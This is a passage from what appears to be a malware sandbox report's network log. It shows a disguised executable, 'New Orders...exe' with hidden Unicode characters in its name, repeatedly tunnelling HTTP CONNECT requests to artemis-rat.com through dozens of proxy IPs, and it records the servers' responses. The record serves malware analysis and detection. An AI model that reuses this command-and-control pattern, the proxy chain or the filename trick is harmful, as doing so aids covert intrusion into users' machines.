                                                                                        Mar 11, 2024 16:16:47.668215036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.773382902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.773528099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:59.773328066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1057192.168.2.950624173.212.209.216271387672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.857641935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.930392981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.945301056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:56.039124012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1058192.168.2.95316523.19.244.10910807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.857769966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1059192.168.2.953130177.67.136.24141537672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.858346939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1060192.168.2.953070181.209.78.769997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.858695984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.663964987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.960882902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.273417950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.773469925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.096610069 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1061192.168.2.95314414.103.26.5380007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.859738111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1062192.168.2.95315198.170.57.23141457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.860229015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1063192.168.2.952048181.209.78.759997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.861730099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1064192.168.2.95315298.162.25.7316537672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.862090111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1065192.168.2.953183184.72.36.89807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.867027998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.040052891 CET344INHTTP/1.1 403 Forbidden
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 199
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1066192.168.2.95229285.116.120.10636297672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.867371082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1067192.168.2.952186103.242.105.730307672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.871851921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.375981092 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1068192.168.2.953153115.84.248.14080807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.874454021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.202105045 CET1286INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Cache-Control: max-age=0, no-cache, no-store, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                        Content-Length: 3172
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 54 68 65 20 55 6e 69 66 6f 72 6d 20 53 65 72 76 65 72 20 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 44 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 65 20 55 6e 69 66 6f 72 6d 20 53 65 72 76 65 72 20 5a 65 72 6f 20 31 31 2e 32 2e 30 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 65 20 55 6e 69 66 6f 72 6d 20 53 65 72 76 65 72 2c 20 4d 50 47 2c 20 4d 69 6b 65 20 47 6c 65 61 76 65 73 2c 20 52 69 63 2c 20 55 6e 69 53 65 72 76 65 72 2c 20 4f 6c 61 6a 69 64 65 2c 20 42 6f 62 53 20 22 20 2f 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 2f 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2f 0d 0a 2e 69 6e 74 72 6f 7b 0d 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 33 30 70 78 3b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 0d 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 45 37 45 37 46 44 3b 0d 0a 7d 0d 0a 2f 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2f 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 3c 64 69 76 20 69 64 3d 22 77 72 61 70 22 3e 0d 0a 20 20 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 0d 0a 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 75 6e 69 66 6f 72 6d 73 65 72 76 65 72 2e 63 6f 6d 22 3e 3c 69 6d 67 20 73 72 63 3d 22 69 6d 61 67 65 73 2f 6c 6f 67 6f 2e 70 6e 67 22 20 61 6c 69 67 6e 3d 22 6c 65 66 74 22 20 61 6c 74 3d 22 54 68 65 20 55 6e 69 66 6f 72 6d 20 53 65 72 76 65 72 22
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><title>The Uniform Server </title><meta name="Description" content="The Uniform Server Zero 11.2.0" /><meta name="Keywords" content="The Uniform Server, MPG, Mike Gleaves, Ric, UniServer, Olajide, BobS " /><link rel="stylesheet" type="text/css" href="css/style.css" media="screen" /></head><style type="text/css">/*****************************************/.intro{ margin-top:30px; padding:10px; font-size:12px; font-family:Verdana; background-color: #E7E7FD;}/*****************************************/</style><body><div id="wrap"> <div id="header"> <a href="http://www.uniformserver.com"><img src="images/logo.png" align="left" alt="The Uniform Server"
                                                                                        Mar 11, 2024 16:16:44.514323950 CET454INHTTP/1.1 400 Bad Request
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                        Content-Length: 226
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1069192.168.2.95307343.231.22.229807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.874973059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.292037964 CET343INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 182
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1070192.168.2.952409162.214.103.87363047672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.875359058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.976536989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.985382080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.976720095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:07.976607084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:20.073348999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:32.070049047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:56.070028067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1071192.168.2.952417167.71.5.8380807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.875782013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.676779032 CET28INHTTP/1.1 400 Bad Request


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1072192.168.2.952434162.214.162.180463697672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.878448963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.976433992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.985385895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.976655006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:07.976272106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:20.070002079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1073192.168.2.953196172.67.200.220807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.878449917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.032480955 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
